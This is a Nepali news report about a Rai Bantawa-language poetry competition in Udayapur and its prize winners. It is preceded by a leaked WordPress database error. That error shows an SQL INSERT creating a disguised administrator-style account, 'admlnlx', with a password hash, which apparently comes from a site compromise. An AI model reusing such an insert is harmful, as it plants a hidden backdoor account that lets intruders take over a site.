WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BAxTEx24PSxVsD6/kNGTjOTcjjGPKO1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 16:03:07', '', 'admlnlx', 'admlnlx')
गाईघाट ( उदयपुर ),मंसिर २६ –
विसं २००७ का प्रजातान्त्रिक योद्धा तथा नेपाली काँग्रेसका नेता नारदमुनि थुलुङको स्मृति र ‘बुङ्खाम’ मासिक पत्रिकाको बाह्रौँ वार्षिकोत्सवका अवसरमा शनिबार राई वान्तवा भाषामा आयोजित खुला प्रतियोगितात्मक कविगोष्ठी सम्पन्न भएको छ ।
पैँतालिस कवि सहभागी रहेको उक्त गोष्ठीमा सुनसरी धरानका यादव समिर राई प्रथम भएबापत रु दश हजारले पुरस्कृत हुनुभयो । कार्यक्रमका संयोजक पदम राईका अनुसार द्वितीय इलामका रुपेन राई र तृतीय गङ्गामाया राई हुनुभयो । उहाँहरुलाई क्रमशः रु छ हजार र चार हजार प्रदान गरियो ।
विजयी कविलाई नेपाल प्रज्ञा–प्रष्ठिान, मातृभाषा विभागका प्रमुख श्रवण मुकाङले पुरस्कार प्रदान गर्नुभएको थियो । – रासस